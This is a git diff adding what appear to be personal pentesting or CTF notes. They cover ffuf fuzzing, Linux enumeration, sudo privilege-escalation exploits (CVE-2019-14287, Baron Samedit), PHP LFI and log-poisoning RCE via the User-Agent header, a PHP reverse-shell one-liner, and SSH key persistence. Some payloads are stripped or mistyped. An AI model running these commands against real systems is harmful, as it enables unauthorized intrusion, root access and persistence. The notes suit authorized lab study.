diff --git a/enumeration/Sublist3r b/enumeration/Sublist3r new file mode 160000 index 0000000..729d649 --- /dev/null +++ b/enumeration/Sublist3r @@ -0,0 +1 @@ +Subproject commit 729d649ec5370730172bf6f5314aafd68c874124 diff --git a/enumeration/docs/ffuf.md b/enumeration/docs/ffuf.md new file mode 100644 index 0000000..7b8001c --- /dev/null +++ b/enumeration/docs/ffuf.md @@ -0,0 +1,41 @@ +# Fuzz Faster U Fool + +## Usage +```sh +ffuf -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt +``` +* Fuzz dirs +```sh +ffuf -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt +``` +* Fuzz files +```sh +ffuf -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt +``` + +### Fuzz parameters +```sh +ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 39 +ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39 +``` +* Fuzz values +```sh +seq 0 255 | fuff -u 'http:///sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33 +``` +* Fuzz Post Methods +```sh +ffuf -u http:///sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded' +``` + +### Fuzz Subdomains +```sh +ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt +``` +* Fuzz Vhosts & Server Blocks +```sh +ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0 +ffuf -u http://test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.test.com' -fs 0 +``` + +### Proxy +* `-replay-proxy ` or `-x ` diff --git a/enumeration/docs/linux_basics.md b/enumeration/docs/linux_basics.md new file mode 100644 index 0000000..64d29cb --- /dev/null +++ b/enumeration/docs/linux_basics.md @@ -0,0 +1,37 @@ +# Linux Basic Enumeration +```sh +less ~/.bash_history +``` +```sh +cat /etc/*-release +cat /proc/version +uname -a +``` +```sh +sudo -V +sudo -L +``` +* Check if is writeable +```sh +vim /etc/passwd +vim /etc/hosts +``` +```sh +crontab -l +``` + +* Find interesting files +```sh +find / -perm /6000 2>/dev/null +find / -perm -u=s -type f 2>/dev/null +find / -type f -name "*.log" 2>/dev/null +find / -type f -name "*.bak" 2>/dev/null +find / -type f -name "*.conf" 2>/dev/null +``` + +* Open Sockets +```sh +lsof -i +netstat -natup +ss -natup +``` diff --git a/enumeration/nmap-full.gnmap b/enumeration/nmap-full.gnmap deleted file mode 100644 index c7edec2..0000000 --- a/enumeration/nmap-full.gnmap +++ /dev/null @@ -1,4 +0,0 @@ -# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247 -Host: 10.10.156.247 () Status: Up -Host: 10.10.156.247 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49161/open/tcp//unknown///, 49162/open/tcp///// -# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds diff --git a/enumeration/nmap-full.nmap b/enumeration/nmap-full.nmap deleted file mode 100644 index 7ffc626..0000000 --- a/enumeration/nmap-full.nmap +++ /dev/null @@ -1,19 +0,0 @@ -# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247 -Nmap scan report for 10.10.156.247 -Host is up (0.064s latency). -Not shown: 64293 closed ports, 1231 filtered ports -Some closed ports may be reported as filtered due to --defeat-rst-ratelimit -PORT STATE SERVICE -135/tcp open msrpc -139/tcp open netbios-ssn -445/tcp open microsoft-ds -3389/tcp open ms-wbt-server -31337/tcp open Elite -49152/tcp open unknown -49153/tcp open unknown -49154/tcp open unknown -49155/tcp open unknown -49161/tcp open unknown -49162/tcp open unknown - -# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds diff --git a/enumeration/nmap-full.xml b/enumeration/nmap-full.xml deleted file mode 100644 index 40c82ff..0000000 --- a/enumeration/nmap-full.xml +++ /dev/null @@ -1,35 +0,0 @@ - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/exploit/sudo/CVE_2019_14287.md b/exploit/sudo/CVE_2019_14287.md new file mode 100644 index 0000000..8c9a582 --- /dev/null +++ b/exploit/sudo/CVE_2019_14287.md @@ -0,0 +1,9 @@ +# CVE-2019-14287 + +* Versions < 1.8.28 + +## Usage +* Integer overflow with resulting root status. +```sh +sudo -u#-1 +``` diff --git a/exploit/sudo/baron_samedit.md b/exploit/sudo/baron_samedit.md new file mode 100644 index 0000000..eaf8fab --- /dev/null +++ b/exploit/sudo/baron_samedit.md @@ -0,0 +1,13 @@ +# CVE-2021-3156 Baron Samedit + +* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit) +* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git) +* Heap based overflow +* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1 +* Check vulnerability via +```sh +sudoedit -s '\' $(python -c "print('\x41' * 10000)") +``` + + + diff --git a/exploit/web/php/php_base64_filter.md b/exploit/web/php/php_base64_filter.md new file mode 100644 index 0000000..cac118b --- /dev/null +++ b/exploit/web/php/php_base64_filter.md @@ -0,0 +1,6 @@ +# PHP Filter + +* Include into GET query, and get index page, for example +```sh +/?view=php://filter/read=convert.base64-encode/resource=./dog/../index +``` diff --git a/exploit/web/php_image_exif.md b/exploit/web/php/php_image_exif.md similarity index 100% rename from exploit/web/php_image_exif.md rename to exploit/web/php/php_image_exif.md diff --git a/exploit/web/php/php_user_agent_rce.md b/exploit/web/php/php_user_agent_rce.md new file mode 100644 index 0000000..402710a --- /dev/null +++ b/exploit/web/php/php_user_agent_rce.md @@ -0,0 +1,19 @@ +# RCE inside HTTP Request + +* User Agent can be filled with php code +```sh +GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1 +Host: 10.10.59.238 +User-Agent: :/shell.php')); ?> +[...] +``` + +* copied from browser as curl command: +``` +curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: " +``` +* go to the access log +```sh +10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access +``` +* Afterwards visit `10.10.211.157/monkey.php` diff --git a/misc/printer_hacking/PRET b/misc/printer_hacking/PRET new file mode 160000 index 0000000..40505ce --- /dev/null +++ b/misc/printer_hacking/PRET @@ -0,0 +1 @@ +Subproject commit 40505ce3869707efb7890b55519b3ee829adefbd diff --git a/misc/printer_hacking/preta.md b/misc/printer_hacking/preta.md new file mode 100644 index 0000000..cb8bdab --- /dev/null +++ b/misc/printer_hacking/preta.md @@ -0,0 +1,4 @@ +# Printer Hacking + +* [Preta](https://github.com/RUB-NDS/PRET) +* [Cheat Sheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet) diff --git a/reverse_shells/docs/shell_collection.md b/reverse_shells/docs/shell_collection.md new file mode 100644 index 0000000..d22380b --- /dev/null +++ b/reverse_shells/docs/shell_collection.md @@ -0,0 +1,31 @@ +# Upgrade Reverse Shell + +## Via interpreter +### PHP +* reverse shell +```php +php -r '$sock=fsockopen("", );exec("/bin/sh -i <&3 >&3 2>&3");' +``` +```php +php -r 'exec ("/bin/bash")";' +``` +* Sometimes even +```php +php -e 'exec "/bin/bash";' +``` + +### Python +```python +python -c 'import pty; pty.spawn("/bin/bash")' +``` + +## Next +1. `ctrl` + `z` +2. `stty echo -raw` +3. `fg` +4. `export TERM=xterm` + +## Via SSH +* `ssh-keygen` +* copy priv key and `chmod 600` +* `cat id_rsa.pub > authorized_keys` on target